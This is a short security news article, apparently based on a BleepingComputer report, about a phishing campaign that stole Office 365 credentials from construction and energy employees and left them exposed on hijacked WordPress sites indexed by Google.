Fraudsters behind a phishing scam that focused on employees of companies in the construction and energy industry had their plans ruined when they carelessly left the passwords they stole on WordPress-hosted domains, making the credentials accessible to everyone via Google search engine. A team of researchers made the discovery of the stolen credentials on Thursday.
The fraudsters sent different formats of scam emails to employees of targeted companies, going to different lengths to make the emails look genuine. The emails often included the employees’ names and titles and looked like notifications from Xeros.
One thing the recipients of the email could not have known is that the emails had an HTML file that was coded to steal users’ passwords and other login credentials. The attackers were able to infiltrate Office 365’s ATP filtering. More than 1,000 victims that were employees of different companies had their login details pilfered, according to reports.
The attackers also compromised a host of websites hosted on WordPress. It was on these websites that they stored the stolen credentials and processed each as they received them. This step made the stolen credentials available to anyone that had access to the Google search engine since the websites are indexed by Google, Zdnet reports.
The team stated that the attackers knew their websites would most likely be flagged by security filtering, so they hijacked the websites for their good reputations with security protections.
“They knew the bad reputations of their own websites will make it difficult to bypass security protections, so they opted for websites that have good reputations,” the team wrote.
According to the team’s report published on Thursday, after checking through about half of the credentials that were stored on the compromised websites, they discovered that the attackers did not limit their attack to employees of the construction and energy industry only, though they showed a preference for them, the team said. The attackers also had stolen credentials from employees in Information Technology, Real Estate, Healthcare, and the manufacturing industries.
The team also discovered that the attackers have been around since at least August 2020. They made this discovery by comparing the emails with ones from another phishing scam from August 2020. They found out that the JavaScript used in the encoding of the emails from the two campaigns is the same.
Source: bleepingcomputer.com
